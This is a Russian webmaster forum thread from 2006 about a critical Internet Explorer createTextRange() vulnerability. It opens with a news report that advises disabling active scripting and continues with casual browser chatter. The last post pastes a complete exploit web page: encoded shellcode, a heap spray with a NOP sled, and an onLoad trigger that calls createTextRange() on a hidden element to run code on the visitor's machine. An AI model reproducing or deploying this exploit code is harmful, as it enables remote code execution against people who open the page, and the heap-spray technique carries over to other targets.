форум вебмастероff на AlfaSpace.NET

Ubuntu и Linux |реактивный бесплатный хостинг | Киноклуб. ВСЁ БЕСПЛАТНО!
база знаний хостинга | правила форума

  Начало ° Ответить ° Статистика ° Опрос ° Регистрация ° Поиск ° FAQ °
Форум вебмастеров на AlfaSpace.NET / The Matrix Has You / Новая критическая уязвимость в Microsoft Internet Explorer
Автор Сообщение
help
Техпомощь

1238		 # Дата: 29 Мар 2006 10:22


Недавно обнаруженная уязвимость в Microsoft Internet Explorer позволяет
злоумышленнику запустить произвольный код на компьютере пользователя.
Первой об этой уязвимости сообщила датская фирма Secunia, занимающаяся компьютерной безопасностью. 23 марта Microsoft подтвердила существование этой уязвимости в Internet Explorer.

Новая уязвимость связана с тем, как Internet Explorer обрабатывает вызов
метода "createTextRange()" языка DHTML, расширенной версии
языка HTML. Специально созданная веб-страница может вызвать сбой
Internet Explorer, повреждающий системную память и позволяющий
злоумышленнику выполнить произвольный код на компьютере пользователя.

Уязвимость существует даже в системе с Windows XP SP2 и Internet
Explorer 6. Бета-версия Internet Explorer 7 Beta 2 Preview, выпущенная
20 марта 2006 года, не имеет данной уязвимости, в отличие от беты,
выпущенной в январе.

По словам Microsoft, работа над патчем уже ведется. А пока для защиты
рекомендуется отключить выполнение активных сценариев в Internet
Explorer.


Viruslist.com


SpiriTzzz
Темный джедай

1384		 # Дата: 29 Мар 2006 10:48


напрашивается вопрос: Сколько можно? но я юзаю лису

Рамиль
minibb moder

1151		 # Дата: 29 Мар 2006 10:55 ° Поправил: Рамиль


Мдааа, похоже у Microsoft получается делать только заплатки на их дырявый софт, хотя кто знает, может их заплатки дырявее их дырявого софта?
З.Ы. вот это я закрутил!

Boltbatlog
Участник

225		 # Дата: 30 Мар 2006 01:09


Рамиль


Я Авант юзаю и все гуд...
Roler
USA Hater

1281		 # Дата: 30 Мар 2006 01:14


Авант сделан на том же движке. Много дырок там осталось.
Borman
Участник

1026		 # Дата: 30 Мар 2006 01:19


help, ты про это?: 
 
<SCRIPT> 
function foo () 
{ 
    shellcode = unescape(	"%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + 
    "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + 
    "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + 
    "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + 
    "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + 
    "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + 
    "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + 
    "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + 
    "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + 
    "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + 
    "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + 
    "%uCC4A%uD0FF"); 
    bigblock = unescape("%u9090%u9090"); 
    slackspace = 20 + shellcode.length; 
    while (bigblock.length < slackspace) bigblock += bigblock; 
    fillblock = bigblock.substring(0, slackspace); 
    block = bigblock.substring(0, bigblock.length-slackspace); 
    while (block.length + slackspace < 0x40000) block = block + block + fillbloc 
k; 
    memory = new Array(); 
    for ( i = 0; i < 2020; i++ ) memory[i] = block + shellcode; 
    var r = document.getElementById('blah').createTextRange(); 
} 
</SCRIPT> 
</HEAD> 
<BODY bgColor=#000000 onLoad="javascript:setTimeout('foo ();', 3000);"> 
<INPUT type="checkbox" id="blah"  style="visibility: hidden;"> 
</BODY>


Ваш ответ

Quote  Bold Style  Italic Style  Underlined Style  URL Link  Email Link  Script AutoTab  Preformatted Text  Отменить *Что это?
... Запретить смайлы


Перед отправкой "нелатинского" текста проверьте кодировку броузера!
 » Логин  » Пароль 
 
Powered by miniBB forum software © 2001-2008
Powered by miniBB-gzipper. Original size:26096, gzipped size:8866

Mp3 Download || Webs Studio™ || Song's Lyrics
eXTReMe Tracker Rambler's Top100 Рейтинг@Mail.ru Форум ТвойWeb [Valid RSS]